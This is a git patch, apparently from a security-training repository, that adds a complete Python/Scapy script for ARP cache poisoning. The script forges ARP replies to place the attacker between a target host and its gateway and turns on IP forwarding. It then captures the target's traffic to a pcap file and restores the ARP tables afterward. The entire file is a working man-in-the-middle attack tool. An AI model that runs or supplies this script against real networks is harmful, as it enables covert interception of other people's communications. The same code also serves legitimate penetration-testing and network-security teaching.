From 05194e1e908f792864f11e90658e2fcdaa7c1b17 Mon Sep 17 00:00:00 2001 From: Omar Santos Date: Tue, 23 Feb 2021 20:42:33 -0500 Subject: [PATCH] Create arp_cache_poisoner.py --- python_ruby_and_bash/arp_cache_poisoner.py | 83 ++++++++++++++++++++++ 1 file changed, 83 insertions(+) create mode 100644 python_ruby_and_bash/arp_cache_poisoner.py diff --git a/python_ruby_and_bash/arp_cache_poisoner.py b/python_ruby_and_bash/arp_cache_poisoner.py new file mode 100644 index 0000000..0feaac7 --- /dev/null +++ b/python_ruby_and_bash/arp_cache_poisoner.py @@ -0,0 +1,83 @@ +# Script to perform an ARP cache poisoning attack + +from scapy.all import * +import os +import signal +import sys +import threading +import time + +#network and interface parameters +gateway_ip = "192.168.78.1" +target_ip = "192.168.78.123" +packet_count = 1000 +conf.iface = "en0" +conf.verb = 0 + +# Once given an IP address, it will try to find a MAC address. +def get_mac(ip_address): + #An alternate method is using Layer 2: resp, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=ip_address)) + resp, unans = sr(ARP(op=1, hwdst="ff:ff:ff:ff:ff:ff", pdst=ip_address), retry=2, timeout=10) + for s,r in resp: + return r[ARP].hwsrc + return None + +#Restore the network by reversing the ARP poison attack. Broadcast ARP Reply with +def restore_network(gateway_ip, gateway_mac, target_ip, target_mac): + send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=gateway_ip, hwsrc=target_mac, psrc=target_ip), count=5) + send(ARP(op=2, hwdst="ff:ff:ff:ff:ff:ff", pdst=target_ip, hwsrc=gateway_mac, psrc=gateway_ip), count=5) + print("[*] Disabling IP forwarding") + #Disable IP Forwarding on a mac + os.system("sysctl -w net.inet.ip.forwarding=0") + #kill process on a mac + os.kill(os.getpid(), signal.SIGTERM) + +def arp_poison(gateway_ip, gateway_mac, target_ip, target_mac): + print("[*] Started ARP poison attack [CTRL-C to stop]") + try: + while True: + send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac, psrc=target_ip)) + send(ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=gateway_ip)) + time.sleep(2) + except KeyboardInterrupt: + print("[*] Stopped ARP poison attack. Restoring network") + restore_network(gateway_ip, gateway_mac, target_ip, target_mac) + + +print("[*] Starting arp_cache_poisoner") +print("[*] Enabling IP forwarding") + +os.system("sysctl -w net.inet.ip.forwarding=1") +print(f"[*] Gateway IP address: {gateway_ip}") +print(f"[*] Target IP address: {target_ip}") + +gateway_mac = get_mac(gateway_ip) +if gateway_mac is None: + print("[!] Unable to get gateway MAC address. Exiting..") + sys.exit(0) +else: + print(f"[*] Gateway MAC address: {gateway_mac}") + +target_mac = get_mac(target_ip) +if target_mac is None: + print("[!] Unable to get target MAC address. Exiting..") + sys.exit(0) +else: + print(f"[*] Target MAC address: {target_mac}") + +#ARP poison thread +poison_thread = threading.Thread(target=arp_poison, args=(gateway_ip, gateway_mac, target_ip, target_mac)) +poison_thread.start() + +#Collect packet captures and save it to a file +try: + sniff_filter = "ip host " + target_ip + print(f"[*] Starting network capture. Packet Count: {packet_count}. Filter: {sniff_filter}") + packets = sniff(filter=sniff_filter, iface=conf.iface, count=packet_count) + wrpcap(target_ip + "_capture.pcap", packets) + print(f"[*] Stopping network capture..Restoring network") + restore_network(gateway_ip, gateway_mac, target_ip, target_mac) +except KeyboardInterrupt: + print(f"[*] Stopping network capture..Restoring network") + restore_network(gateway_ip, gateway_mac, target_ip, target_mac) + sys.exit(0)